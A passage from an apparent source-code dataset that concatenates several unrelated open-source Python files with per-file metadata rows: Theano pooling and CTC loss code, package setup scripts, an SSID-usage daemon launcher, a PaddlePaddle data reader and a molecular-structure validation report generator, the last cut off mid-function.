# TODO remove the old call once Theano older than 0.9.0dev4 is deprecated
try:
# new interface (introduced in 0.9.0dev4)
pool_out = pool.pool_2d(x, ws=pool_size, stride=strides,
ignore_border=True,
pad=padding,
mode='max')
except TypeError:
# old interface
pool_out = pool.pool_2d(x, ds=pool_size, st=strides,
ignore_border=True,
padding=padding,
mode='max')
elif pool_mode == 'avg':
# TODO remove the old call once Theano older than 0.9.0dev4 is deprecated
try:
# new interface (introduced in 0.9.0dev4)
pool_out = pool.pool_2d(x, ws=pool_size, stride=strides,
ignore_border=True,
pad=padding,
mode='average_exc_pad')
except TypeError:
# old interface
pool_out = pool.pool_2d(x, ds=pool_size, st=strides,
ignore_border=True,
padding=padding,
mode='average_exc_pad')
else:
raise ValueError('Invalid pooling mode:', pool_mode)
if border_mode == 'same':
expected_width = (x.shape[2] + strides[0] - 1) // strides[0]
expected_height = (x.shape[3] + strides[1] - 1) // strides[1]
pool_out = pool_out[:, :,
: expected_width,
: expected_height]
if dim_ordering == 'tf':
pool_out = pool_out.dimshuffle((0, 2, 3, 1))
return pool_out
def pool3d(x, pool_size, strides=(1, 1, 1), border_mode='valid',
dim_ordering='default', pool_mode='max'):
if dim_ordering == 'default':
dim_ordering = image_dim_ordering()
if dim_ordering not in {'th', 'tf'}:
raise ValueError('Unknown dim_ordering:', dim_ordering)
# TODO: remove this if statement when Theano without pool_3d is deprecated
# (pool_3d was introduced after 0.9.0dev3)
if not hasattr(T.signal.pool, 'pool_3d'):
return _old_theano_pool3d(x, pool_size, strides, border_mode,
dim_ordering, pool_mode)
if border_mode == 'same':
w_pad = pool_size[0] - 2 if pool_size[0] % 2 == 1 else pool_size[0] - 1
h_pad = pool_size[1] - 2 if pool_size[1] % 2 == 1 else pool_size[1] - 1
d_pad = pool_size[2] - 2 if pool_size[2] % 2 == 1 else pool_size[2] - 1
padding = (w_pad, h_pad, d_pad)
elif border_mode == 'valid':
padding = (0, 0, 0)
else:
raise ValueError('Invalid border mode:', border_mode)
if dim_ordering not in {'th', 'tf'}:
raise ValueError('Unknown dim_ordering:', dim_ordering)
if dim_ordering == 'tf':
x = x.dimshuffle((0, 4, 1, 2, 3))
if pool_mode == 'max':
# TODO remove the old call once Theano older than 0.9.0dev4 is deprecated
try:
# new interface (introduced in 0.9.0dev4)
pool_out = pool.pool_3d(x, ws=pool_size, stride=strides,
ignore_border=True,
pad=padding,
mode='max')
except TypeError:
# old interface
pool_out = pool.pool_3d(x, ds=pool_size, st=strides,
ignore_border=True,
padding=padding,
mode='max')
elif pool_mode == 'avg':
# TODO remove the old call once Theano older than 0.9.0dev4 is deprecated
try:
# new interface (introduced in 0.9.0dev4)
pool_out = pool.pool_3d(x, ws=pool_size, stride=strides,
ignore_border=True,
pad=padding,
mode='average_exc_pad')
except TypeError:
# old interface
pool_out = pool.pool_3d(x, ds=pool_size, st=strides,
ignore_border=True,
padding=padding,
mode='average_exc_pad')
else:
raise ValueError('Invalid pooling mode:', pool_mode)
if border_mode == 'same':
expected_width = (x.shape[2] + strides[0] - 1) // strides[0]
expected_height = (x.shape[3] + strides[1] - 1) // strides[1]
expected_depth = (x.shape[4] + strides[2] - 1) // strides[2]
pool_out = pool_out[:, :,
: expected_width,
: expected_height,
: expected_depth]
if dim_ordering == 'tf':
pool_out = pool_out.dimshuffle((0, 2, 3, 4, 1))
return pool_out
# TODO: remove this function when Theano without pool_3d is deprecated
# (pool_3d was introduced after 0.9.0dev3)
def _old_theano_pool3d(x, pool_size, strides=(1, 1, 1), border_mode='valid',
dim_ordering='default', pool_mode='max'):
if dim_ordering == 'default':
dim_ordering = image_dim_ordering()
if dim_ordering not in {'th', 'tf'}:
raise ValueError('Unknown dim_ordering:', dim_ordering)
if border_mode == 'same':
# TODO: add implementation for border_mode="same"
raise ValueError('border_mode="same" not supported with Theano.')
elif border_mode == 'valid':
ignore_border = True
padding = (0, 0)
else:
raise ValueError('Invalid border mode:', border_mode)
if dim_ordering not in {'th', 'tf'}:
raise ValueError('Unknown dim_ordering:', dim_ordering)
if dim_ordering == 'tf':
x = x.dimshuffle((0, 4, 1, 2, 3))
if pool_mode == 'max':
# pooling over conv_dim2, conv_dim1 (last two channels)
output = pool.pool_2d(input=x.dimshuffle(0, 1, 4, 3, 2),
ds=(pool_size[1], pool_size[0]),
st=(strides[1], strides[0]),
ignore_border=ignore_border,
padding=padding,
mode='max')
# pooling over conv_dim3
pool_out = pool.pool_2d(input=output.dimshuffle(0, 1, 4, 3, 2),
ds=(1, pool_size[2]),
st=(1, strides[2]),
ignore_border=ignore_border,
padding=padding,
mode='max')
elif pool_mode == 'avg':
# pooling over conv_dim2, conv_dim1 (last two channels)
output = pool.pool_2d(input=x.dimshuffle(0, 1, 4, 3, 2),
ds=(pool_size[1], pool_size[0]),
st=(strides[1], strides[0]),
ignore_border=ignore_border,
padding=padding,
mode='average_exc_pad')
# pooling over conv_dim3
pool_out = pool.pool_2d(input=output.dimshuffle(0, 1, 4, 3, 2),
ds=(1, pool_size[2]),
st=(1, strides[2]),
ignore_border=ignore_border,
padding=padding,
mode='average_exc_pad')
else:
raise ValueError('Invalid pooling mode:', pool_mode)
if dim_ordering == 'tf':
pool_out = pool_out.dimshuffle((0, 2, 3, 4, 1))
return pool_out
# RANDOMNESS
def random_normal(shape, mean=0.0, std=1.0, dtype=None, seed=None):
if dtype is None:
dtype = floatx()
if seed is None:
seed = np.random.randint(1, 10e6)
rng = RandomStreams(seed=seed)
return rng.normal(size=shape, avg=mean, std=std, dtype=dtype)
def random_uniform(shape, low=0.0, high=1.0, dtype=None, seed=None):
if dtype is None:
dtype = floatx()
if seed is None:
seed = np.random.randint(1, 10e6)
rng = RandomStreams(seed=seed)
return rng.uniform(shape, low=low, high=high, dtype=dtype)
def random_binomial(shape, p=0.0, dtype=None, seed=None):
if dtype is None:
dtype = floatx()
if seed is None:
seed = np.random.randint(1, 10e6)
rng = RandomStreams(seed=seed)
return rng.binomial(shape, p=p, dtype=dtype)
# Theano implementation of CTC
# Used with permission from Shawn Tan
# https://github.com/shawntan/
# Note that tensorflow's native CTC code is significantly
# faster than this
def ctc_interleave_blanks(Y):
Y_ = T.alloc(-1, Y.shape[0] * 2 + 1)
Y_ = T.set_subtensor(Y_[T.arange(Y.shape[0]) * 2 + 1], Y)
return Y_
def ctc_create_skip_idxs(Y):
skip_idxs = T.arange((Y.shape[0] - 3) // 2) * 2 + 1
non_repeats = T.neq(Y[skip_idxs], Y[skip_idxs + 2])
return skip_idxs[non_repeats.nonzero()]
def ctc_update_log_p(skip_idxs, zeros, active, log_p_curr, log_p_prev):
active_skip_idxs = skip_idxs[(skip_idxs < active).nonzero()]
active_next = T.cast(T.minimum(
T.maximum(
active + 1,
T.max(T.concatenate([active_skip_idxs, [-1]])) + 2 + 1
), log_p_curr.shape[0]), 'int32')
common_factor = T.max(log_p_prev[:active])
p_prev = T.exp(log_p_prev[:active] - common_factor)
_p_prev = zeros[:active_next]
# copy over
_p_prev = T.set_subtensor(_p_prev[:active], p_prev)
# previous transitions
_p_prev = T.inc_subtensor(_p_prev[1:], _p_prev[:-1])
# skip transitions
_p_prev = T.inc_subtensor(_p_prev[active_skip_idxs + 2], p_prev[active_skip_idxs])
updated_log_p_prev = T.log(_p_prev) + common_factor
log_p_next = T.set_subtensor(
zeros[:active_next],
log_p_curr[:active_next] + updated_log_p_prev
)
return active_next, log_p_next
def ctc_path_probs(predict, Y, alpha=1e-4):
smoothed_predict = (1 - alpha) * predict[:, Y] + alpha * np.float32(1.) / Y.shape[0]
L = T.log(smoothed_predict)
zeros = T.zeros_like(L[0])
log_first = zeros
f_skip_idxs = ctc_create_skip_idxs(Y)
b_skip_idxs = ctc_create_skip_idxs(Y[::-1]) # there should be a shortcut to calculating this
def step(log_f_curr, log_b_curr, f_active, log_f_prev, b_active, log_b_prev):
f_active_next, log_f_next = ctc_update_log_p(f_skip_idxs, zeros, f_active, log_f_curr, log_f_prev)
b_active_next, log_b_next = ctc_update_log_p(b_skip_idxs, zeros, b_active, log_b_curr, log_b_prev)
return f_active_next, log_f_next, b_active_next, log_b_next
[f_active, log_f_probs, b_active, log_b_probs], _ = theano.scan(
step, sequences=[L, L[::-1, ::-1]], outputs_info=[np.int32(1), log_first, np.int32(1), log_first])
idxs = T.arange(L.shape[1]).dimshuffle('x', 0)
mask = (idxs < f_active.dimshuffle(0, 'x')) & (idxs < b_active.dimshuffle(0, 'x'))[::-1, ::-1]
log_probs = log_f_probs + log_b_probs[::-1, ::-1] - L
return log_probs, mask
def ctc_cost(predict, Y):
log_probs, mask = ctc_path_probs(predict, ctc_interleave_blanks(Y))
common_factor = T.max(log_probs)
total_log_prob = T.log(T.sum(T.exp(log_probs - common_factor)[mask.nonzero()])) + common_factor
return -total_log_prob
# batchifies original CTC code
def ctc_batch_cost(y_true, y_pred, input_length, label_length):
"""Runs CTC loss algorithm on each batch element.
# Arguments
y_true: tensor (samples, max_string_length) containing the truth labels
y_pred: tensor (samples, time_steps, num_categories) containing the prediction,
or output of the softmax
input_length: tensor (samples,1) containing the sequence length for
each batch item in y_pred
label_length: tensor (samples,1) containing the sequence length for
each batch item in y_true
# Returns
Tensor with shape (samples,1) containing the
CTC loss of each element
"""
def ctc_step(y_true_step, y_pred_step, input_length_step, label_length_step):
y_pred_step = y_pred_step[0: input_length_step[0]]
y_true_step = y_true_step[0:label_length_step[0]]
return ctc_cost(y_pred_step, y_true_step)
ret, _ = theano.scan(
fn=ctc_step,
outputs_info=None,
sequences=[y_true, y_pred, input_length, label_length]
)
ret = ret.dimshuffle('x', 0)
return ret
# HIGH ORDER FUNCTIONS
def map_fn(fn, elems, name=None):
"""Map the function fn over the elements elems and return the outputs.
# Arguments
fn: Callable that will be called upon each element in elems
elems: tensor, at least 2 dimensional
name: A string name for the map node in the graph
# Returns
Tensor with first dimension equal to the elems and second depending on
fn
"""
return theano.map(fn, elems, name=name)[0]
def foldl(fn, elems, initializer=None, name=None):
"""Reduce elems using fn to combine them from left to right.
# Arguments
fn: Callable that will be called upon each element in elems and an
accumulator, for instance lambda acc, x: acc + x
elems: tensor
initializer: The first value used (elems[0] in case of None)
name: A string name for the foldl node in the graph
# Returns
Same type and shape as initializer
"""
if initializer is None:
initializer = elems[0]
elems = elems[1:]
# We need to change the order of the arguments because theano accepts x as
# first parameter and accumulator as second
fn2 = lambda x, acc: fn(acc, x)
return theano.foldl(fn2, elems, initializer, name=name)[0]
def foldr(fn, elems, initializer=None, name=None):
"""Reduce elems using fn to combine them from right to left.
# Arguments
fn: Callable that will be called upon each element in elems and an
accumulator, for instance lambda acc, x: acc + x
elems: tensor
initializer: The first value used (elems[-1] in case of None)
name: A string name for the foldr node in the graph
# Returns
Same type and shape as initializer
"""
if initializer is None:
initializer = elems[-1]
elems = elems[:-1]
# We need to change the order of the arguments because theano accepts x as
# first parameter and accumulator as second
fn2 = lambda x, acc: fn(acc, x)
return theano.foldr(fn2, elems, initializer, name=name)[0]
| 33.787081
| 125
| 0.601572
|
4a07b003c8d845afc73bfa6e59ebfbaf3584af25
| 947
|
py
|
Python
|
source/lib/MediaReplayEngineWorkflowHelper/setup.py
|
awslabs/aws-media-replay-engine
|
2c217eff42f8e2c56b43e2ecf593f5aaa92c5451
|
[
"Apache-2.0"
] | 22
|
2021-11-24T01:23:07.000Z
|
2022-03-26T23:24:46.000Z
|
source/lib/MediaReplayEngineWorkflowHelper/setup.py
|
awslabs/aws-media-replay-engine
|
2c217eff42f8e2c56b43e2ecf593f5aaa92c5451
|
[
"Apache-2.0"
] | null | null | null |
source/lib/MediaReplayEngineWorkflowHelper/setup.py
|
awslabs/aws-media-replay-engine
|
2c217eff42f8e2c56b43e2ecf593f5aaa92c5451
|
[
"Apache-2.0"
] | 3
|
2021-12-10T09:42:51.000Z
|
2022-02-16T02:22:50.000Z
|
# Copyright 2021 Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0
import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="Media Replay Engine Workflow Helper",
version="1.0.0",
author="Aravindharaj Rajendran",
author_email="redacted@example.com",
description="Helper library used by the Media Replay Engine internal lambda functions to interact with the control plane",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/aws-solutions/aws-media-replay-engine",
packages=setuptools.find_packages(),
install_requires=[
'urllib3',
'requests',
'requests-aws4auth'
],
classifiers=[
"Programming Language :: Python :: 3",
"License :: Other/Proprietary License",
"Operating System :: OS Independent",
],
)
| 31.566667
| 126
| 0.695882
|
4a07b014b3f45af3b623d5626c483a845b5faa88
| 112
|
py
|
Python
|
__init__.py
|
sheepmen/pbase
|
6ea54bea91cd9f32cbf73899cbb01f7dddd434ce
|
[
"MIT"
] | null | null | null |
__init__.py
|
sheepmen/pbase
|
6ea54bea91cd9f32cbf73899cbb01f7dddd434ce
|
[
"MIT"
] | null | null | null |
__init__.py
|
sheepmen/pbase
|
6ea54bea91cd9f32cbf73899cbb01f7dddd434ce
|
[
"MIT"
] | 1
|
2018-07-26T01:42:02.000Z
|
2018-07-26T01:42:02.000Z
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
from connection import Connection
from pool import ConnectionPool
| 18.666667
| 33
| 0.741071
|
4a07b113ac259650f9a915f5dd3a8f391e0d877a
| 204
|
py
|
Python
|
samcli/lib/utils/defaults.py
|
torresxb1/aws-sam-cli
|
d307f2eb6e1a91a476a5e2ca6070f974b0c913f1
|
[
"BSD-2-Clause",
"Apache-2.0"
] | 2,959
|
2018-05-08T21:48:56.000Z
|
2020-08-24T14:35:39.000Z
|
samcli/lib/utils/defaults.py
|
torresxb1/aws-sam-cli
|
d307f2eb6e1a91a476a5e2ca6070f974b0c913f1
|
[
"BSD-2-Clause",
"Apache-2.0"
] | 1,469
|
2018-05-08T22:44:28.000Z
|
2020-08-24T20:19:24.000Z
|
samcli/lib/utils/defaults.py
|
torresxb1/aws-sam-cli
|
d307f2eb6e1a91a476a5e2ca6070f974b0c913f1
|
[
"BSD-2-Clause",
"Apache-2.0"
] | 642
|
2018-05-08T22:09:19.000Z
|
2020-08-17T09:04:37.000Z
|
"""
Contains helpers for providing default values
"""
from botocore.session import get_session
def get_default_aws_region() -> str:
return get_session().get_config_variable("region") or "us-east-1"
| 22.666667
| 69
| 0.759804
|
4a07b11f571514006a50bc61964c8db10ad02fde
| 464
|
py
|
Python
|
data/scripts/templates/object/draft_schematic/clothing/shared_clothing_ith_hat_casual_01.py
|
obi-two/GameServer
|
7d37024e2291a97d49522610cd8f1dbe5666afc2
|
[
"MIT"
] | 20
|
2015-02-23T15:11:56.000Z
|
2022-03-18T20:56:48.000Z
|
data/scripts/templates/object/draft_schematic/clothing/shared_clothing_ith_hat_casual_01.py
|
apathyboy/swganh
|
665128efe9154611dec4cb5efc61d246dd095984
|
[
"MIT"
] | null | null | null |
data/scripts/templates/object/draft_schematic/clothing/shared_clothing_ith_hat_casual_01.py
|
apathyboy/swganh
|
665128efe9154611dec4cb5efc61d246dd095984
|
[
"MIT"
] | 20
|
2015-04-04T16:35:59.000Z
|
2022-03-24T14:54:37.000Z
|
#### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Intangible()
result.template = "object/draft_schematic/clothing/shared_clothing_ith_hat_casual_01.iff"
result.attribute_template_id = -1
result.stfName("string_id_table","")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result
| 27.294118
| 90
| 0.737069
|
4a07b1416e99ca56cc5bac659f688589c43cae82
| 1,914
|
py
|
Python
|
ssidstat/ssidstatd/ssidstatd.py
|
putrasattvika/ssidstat
|
90bc4a52702ec314a0385f669d68446fa46fe153
|
[
"Apache-2.0"
] | null | null | null |
ssidstat/ssidstatd/ssidstatd.py
|
putrasattvika/ssidstat
|
90bc4a52702ec314a0385f669d68446fa46fe153
|
[
"Apache-2.0"
] | null | null | null |
ssidstat/ssidstatd/ssidstatd.py
|
putrasattvika/ssidstat
|
90bc4a52702ec314a0385f669d68446fa46fe153
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python2
import monitor
import argparse
import ssidstat
__DEFAULT_INTERVAL = 10
__DEFAULT_PID_FILE = '/var/lib/ssidstat/ssidstatd.pid'
__DEFAULT_OUT_FILE = '/var/lib/ssidstat/ssidstatd.out'
__DEFAULT_ERR_FILE = '/var/lib/ssidstat/ssidstatd.err'
__DEFAULT_DB_FILE = '/var/lib/ssidstat/ssidstatd.db'
def main():
parser = argparse.ArgumentParser()
parser.add_argument("-v", "--version", action="store_true", help="show ssidstat version")
parser.add_argument("--pidfile", help="pidfile, default is {}".format(__DEFAULT_PID_FILE), default=__DEFAULT_PID_FILE)
parser.add_argument("--db", help="database file, default is {}".format(__DEFAULT_DB_FILE), default=__DEFAULT_DB_FILE)
parser.add_argument("--outlog", help="standard output file, default is {}".format(__DEFAULT_OUT_FILE), default=__DEFAULT_OUT_FILE)
parser.add_argument("--errlog", help="standard error file, default is {}".format(__DEFAULT_ERR_FILE), default=__DEFAULT_ERR_FILE)
parser.add_argument("--interval", help="polling interval (secs), default is {} seconds".format(__DEFAULT_INTERVAL), default=__DEFAULT_INTERVAL)
parser.add_argument("--status", action="store_true", help="check whether ssidstat daemon is running or not")
parser.add_argument("--stop", action="store_true", help="stop running ssidstat daemon")
parser.add_argument("--restart", action="store_true", help="restart running ssidstat daemon")
opts = parser.parse_args()
if opts.version:
print 'SSIDStat/SSIDStatd v{}'.format(ssidstat.__version__)
return
monitord = monitor.MonitorDaemon(opts.db, opts.pidfile, opts.interval, stdout=opts.outlog, stderr=opts.errlog)
if opts.status:
if monitord.is_running():
print 'ssidstat daemon is running'
else:
print 'ssidstat daemon is not running'
return
if opts.stop:
monitord.stop()
elif opts.restart:
monitord.restart()
else:
monitord.start()
if __name__ == '__main__':
main()
| 38.28
| 144
| 0.757576
|
4a07b19861e12b9191d5e01b29c82f7c59eb2ce0
| 3,552
|
py
|
Python
|
ST_DM/KDD2021-MSTPAC/code/ST-PAC/frame/core/dataset_reader.py
|
zhangyimi/Research
|
866f91d9774a38d205d6e9a3b1ee6293748261b3
|
[
"Apache-2.0"
] | 1,319
|
2020-02-14T10:42:07.000Z
|
2022-03-31T15:42:18.000Z
|
ST_DM/KDD2021-MSTPAC/code/ST-PAC/frame/core/dataset_reader.py
|
green9989/Research
|
94519a72e7936c77f62a31709634b72c09aabf74
|
[
"Apache-2.0"
] | 192
|
2020-02-14T02:53:34.000Z
|
2022-03-31T02:25:48.000Z
|
ST_DM/KDD2021-MSTPAC/code/ST-PAC/frame/core/dataset_reader.py
|
green9989/Research
|
94519a72e7936c77f62a31709634b72c09aabf74
|
[
"Apache-2.0"
] | 720
|
2020-02-14T02:12:38.000Z
|
2022-03-31T12:21:15.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
################################################################################
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
################################################################################
"""
File: frame/core/dataset_reader.py
Date: 2019/05/07 18:56:25
Brief:
Generate sample for dataset trainer
"""
from __future__ import print_function
import logging
import numpy as np
import logging
import sys
import os
import random
import paddle.fluid.incubate.data_generator as dg
from utils.object_transform import ObjectTransform
class DatasetReader(dg.MultiSlotDataGenerator):
"""
data reader inherated from paddle class MultiSlotDataGenerator
"""
def init_reader(self, obj_str, input_names):
"""
init reader.
"""
self.dataset_instance = ObjectTransform.pickle_loads_from_str(obj_str)
self.input_names = ObjectTransform.pickle_loads_from_str(input_names)
def generate_sample(self, line):
"""
generate_sample from text line.
"""
def _iterator():
"""
closure
"""
for sample in self.dataset_instance.parse_oneline(line):
truncate_sample = [(key, value) for key, value in sample if key in self.input_names]
yield truncate_sample
return _iterator
def generate_batch(self, samples):
"""
This function needs to be overridden by the user to process the
generated samples from generate_sample(self, str) function
It is usually used as batch processing when a user wants to
do preprocessing on a batch of samples, e.g. padding according to
the max length of a sample in the batch
Args:
samples(list tuple): generated sample from generate_sample
Returns:
a python generator, the same format as return value of generate_sample
Example:
.. code-block:: python
import paddle.fluid.incubate.data_generator as dg
class MyData(dg.DataGenerator):
def generate_sample(self, line):
def local_iter():
int_words = [int(x) for x in line.split()]
yield ("words", int_words)
return local_iter
def generate_batch(self, samples):
def local_iter():
for s in samples:
yield ("words", s[1].extend([s[1][0]]))
mydata = MyData()
mydata.set_batch(128)
"""
def _local_iter():
for sample in samples:
yield sample
return _local_iter
if __name__ == "__main__":
dataset_reader = DatasetReader()
dataset_reader.init_reader(sys.argv[1], sys.argv[2])
dataset_reader.run_from_stdin()
| 32.290909
| 100
| 0.593468
|
4a07b2a357f2014f411627b7a49fe1edaea23259
| 14,976
|
py
|
Python
|
master/pyext/src/validation/Report.py
|
salilab/IHMValidation
|
ddf1a080a4b7f66c2f067312f5f4a5c6584848d1
|
[
"MIT"
] | null | null | null |
master/pyext/src/validation/Report.py
|
salilab/IHMValidation
|
ddf1a080a4b7f66c2f067312f5f4a5c6584848d1
|
[
"MIT"
] | 23
|
2020-12-09T22:27:29.000Z
|
2022-03-30T18:01:43.000Z
|
master/pyext/src/validation/Report.py
|
salilab/IHMValidation
|
ddf1a080a4b7f66c2f067312f5f4a5c6584848d1
|
[
"MIT"
] | 1
|
2022-03-21T22:55:24.000Z
|
2022-03-21T22:55:24.000Z
|
###################################
# Script :
# 1) Contains class to write dictionary
# for jinja2/write HTML files/PDF files
# and supplementary table
#
# ganesans - Salilab - UCSF
# ganesans@salilab.org
###################################
import pytz
import jinja2
import pandas as pd
import sys,os,glob
import numpy as np
import validation
from validation import excludedvolume,get_input_information
from validation import molprobity
from validation import get_plots,sas,sas_plots
from validation import cx,cx_plots
from validation import utility
#import pdfkit
import datetime,time
import pickle
from multiprocessing import Process, Queue, Pool, Manager
from collections import Counter
import argparse
import json
class WriteReport(object):
def __init__(self,mmcif_file):
self.mmcif_file = mmcif_file
self.I=get_input_information(self.mmcif_file)
def run_entry_composition(self,Template_Dict:dict)->dict:
'''
get entry composition, relies on IHM library
'''
start=time.process_time()
name=self.mmcif_file.split('.')[0].split('_')[0]
if self.I.get_ensembles():
ensemble_info=utility.dict_to_JSlist(self.I.get_ensembles())
else:
ensemble_info=None
Template_Dict['ensemble_info']=ensemble_info
Template_Dict['sphere']=self.I.check_sphere()
Template_Dict['num_ensembles']=self.I.check_ensembles()
RB,flex,RB_nos,all_nos=self.I.get_RB_flex_dict()
Template_Dict['Rigid_Body']=RB_nos
Template_Dict['Flexible_Unit']=all_nos-RB_nos
Template_Dict['RB_list']=utility.dict_to_JSlist_rows(RB,flex)
Template_Dict['RB']=utility.get_RB(utility.dict_to_JSlist_rows(RB,flex))
Template_Dict['flex']=utility.get_flex(utility.dict_to_JSlist_rows(RB,flex))
Template_Dict['ID']=self.I.get_id()
Template_Dict['ID_w']=self.I.get_id().split()
Template_Dict['ID_T']=self.I.get_id()[0:6]+'_'+self.I.get_id()[6:]
Template_Dict['ID_R']=(self.I.get_id()[0:6]+'_'+self.I.get_id()[6:]).split()
Template_Dict['Molecule']=self.I.get_struc_title()
Template_Dict['Title']=self.I.get_title()
Template_Dict['Authors']=self.I.get_authors()
Template_Dict['Entry_list']=utility.dict_to_JSlist(self.I.get_composition())
Template_Dict['number_of_molecules']=self.I.get_number_of_models()
Template_Dict['model_names']=self.I.get_model_names()
Template_Dict['number_of_software']=self.I.get_software_length()
Template_Dict['soft_list']=utility.dict_to_JSlist(self.I.get_software_comp())
Template_Dict['number_of_datasets']=self.I.get_dataset_length()
Template_Dict['Data']=[i.upper() for i in list(set(self.I.get_dataset_comp()['Dataset type']).difference({'Experimental model','Comparative model'}))]
Template_Dict['Datasets_list']=utility.dict_to_JSlist(self.I.get_dataset_comp())
Template_Dict['Protocols_number']=self.I.get_protocol_number()
Template_Dict['Sampling_list']=utility.dict_to_JSlist(self.I.get_sampling())
Template_Dict['num_chains']=int(len(self.I.get_composition()['Chain ID']))/int(len(list(Counter(self.I.get_composition()['Model ID']).keys())))
return Template_Dict
def run_model_quality(self,Template_Dict:dict)->(dict,dict,dict,dict,dict):
'''
get excluded volume for multiscale models
get molprobity info for atomic models
exception: models with DNA--we need a way to assess models with DNA
'''
if self.I.check_sphere()<1:
#global clashscore; global rama; global sidechain;
exv_data=None
I_mp=molprobity.get_molprobity_information(self.mmcif_file)
if I_mp.check_for_molprobity():
filename = os.path.abspath(os.path.join(os.getcwd(), 'static/results/',str(Template_Dict['ID'])+'_temp_mp.txt'))
if os.path.exists(filename):
d_mp={}
print ("Molprobity analysis file already exists...\n...assuming clashscores, Ramachandran and rotamer outliers have already been calculated")
with open(filename,'rb') as fp:
d_mp['molprobity']=pickle.load(fp)
f_rota=os.path.abspath(os.path.join(os.getcwd(), 'static/results/',str(Template_Dict['ID'])+'_temp_rota.txt'))
with open(f_rota,'rb') as fp:
d_mp['rota']=pickle.load(fp)
f_rama=os.path.abspath(os.path.join(os.getcwd(), 'static/results/',str(Template_Dict['ID'])+'_temp_rama.txt'))
with open(f_rama,'rb') as fp:
d_mp['rama']=pickle.load(fp)
f_clash=os.path.abspath(os.path.join(os.getcwd(), 'static/results/',str(Template_Dict['ID'])+'_temp_clash.txt'))
with open(f_clash,'rb') as fp:
d_mp['clash']=pickle.load(fp)
else:
print ("Molprobity analysis is being calculated...")
manager = Manager()
d_mp=manager.dict()
utility.runInParallel(I_mp.run_clashscore(d_mp),I_mp.run_ramalyze(d_mp),I_mp.run_rotalyze(d_mp),I_mp.run_molprobity(d_mp))
a,b=I_mp.process_molprobity(d_mp['molprobity'])
Template_Dict['bond']=len(a); Template_Dict['angle']=len(b)
global clashscore;global rama;global sidechain
clashscore,rama,sidechain=I_mp.get_data_for_quality_at_glance(d_mp['molprobity'])
Template_Dict['molp_b']=utility.dict_to_JSlist(I_mp.molprobity_detailed_table_bonds(a))
Template_Dict['molp_a']=utility.dict_to_JSlist(I_mp.molprobity_detailed_table_angles(b))
Template_Dict['rotascore']=utility.dict_to_JSlist(I_mp.rota_summary_table(I_mp.process_rota(d_mp['rota'])))
Template_Dict['rotalist']=utility.dict_to_JSlist(I_mp.rota_detailed_table(I_mp.process_rota(d_mp['rota'])))
Template_Dict['ramascore']=utility.dict_to_JSlist(I_mp.rama_summary_table(I_mp.process_rama(d_mp['rama'])))
Template_Dict['ramalist']=utility.dict_to_JSlist(I_mp.rama_detailed_table(I_mp.process_rama(d_mp['rama'])))
clashscores,Template_Dict['tot']=I_mp.clash_summary_table(d_mp['clash'])
Template_Dict['clashscore_list']=utility.dict_to_JSlist(clashscores)
Template_Dict['clashlist']=I_mp.clash_detailed_table(d_mp['clash'])
Template_Dict['assess_atomic_segments']='Clashscore: '+ str(clashscore) + ', Ramachandran outliers: '+ str(rama)+ '% '+', Sidechain outliers: '+str(sidechain)+'%'
Template_Dict['assess_excluded_volume']=['Not applicable']
else:
if I_mp.check_for_molprobity()==False:
self.I.rewrite_mmcif()
I_mp=molprobity.get_molprobity_information('test.cif')
print ("file rewritten")
if I_mp.check_for_molprobity():
print ("Molprobity analysis is being calculated...")
manager = Manager()
d_mp=manager.dict()
try:
runInParallel(I_mp.run_clashscore(d_mp),I_mp.run_ramalyze(d_mp),I_mp.run_rotalyze(d_mp),I_mp.run_molprobity(d_mp))
a,b=I_mp.process_molprobity(d_mp['molprobity'])
Template_Dict['bond']=len(a); Template_Dict['angle']=len(b)
clashscore,rama,sidechain=I_mp.get_data_for_quality_at_glance(d_mp['molprobity'])
Template_Dict['molp_b']=utility.dict_to_JSlist(I_mp.molprobity_detailed_table_bonds(a))
Template_Dict['molp_a']=utility.dict_to_JSlist(I_mp.molprobity_detailed_table_angles(b))
Template_Dict['rotascore']=utility.dict_to_JSlist(I_mp.rota_summary_table(I_mp.process_rota(d_mp['rota'])))
Template_Dict['rotalist']=utility.dict_to_JSlist(I_mp.rota_detailed_table(I_mp.process_rota(d_mp['rota'])))
Template_Dict['ramascore']=utility.dict_to_JSlist(I_mp.rama_summary_table(I_mp.process_rama(d_mp['rama'])))
Template_Dict['ramalist']=utility.dict_to_JSlist(I_mp.rama_detailed_table(I_mp.process_rama(d_mp['rama'])))
clashscores,Template_Dict['tot']=I_mp.clash_summary_table(d_mp['clash'])
Template_Dict['clashscore_list']=utility.dict_to_JSlist(clashscores)
Template_Dict['clashlist']=I_mp.clash_detailed_table(d_mp['clash'])
Template_Dict['assess_atomic_segments']='Clashscore: '+ str(clashscore) + ', Ramachandran outliers: '+ str(rama)+ '% '+', Sidechain outliers: '+str(sidechain)+'%'
Template_Dict['assess_excluded_volume']=['Not applicable']
except:
print ("Molprobity cannot be calculated...")
clashscore=None
rama=None
sidechain=None
else:
Template_Dict['assess_atomic_segments']='Not applicable'
file=os.getcwd()+'Output/results/'+str(Template_Dict['ID'])+'exv.txt'
if os.path.exists(file):
print ("Excluded volume file already exists...")
with open(file, 'r+') as inf:
line=[ln.replace('[','').replace(']','').replace(',','').split() for ln in inf.readlines()]
exv_data={'Models':line[0],'Excluded Volume Satisfaction (%)':line[1], 'Number of violations':line[2]}
else:
print ("Excluded volume is being calculated...")
I_ev=excludedvolume.get_excluded_volume(self.mmcif_file)
model_dict=I_ev.get_all_spheres()
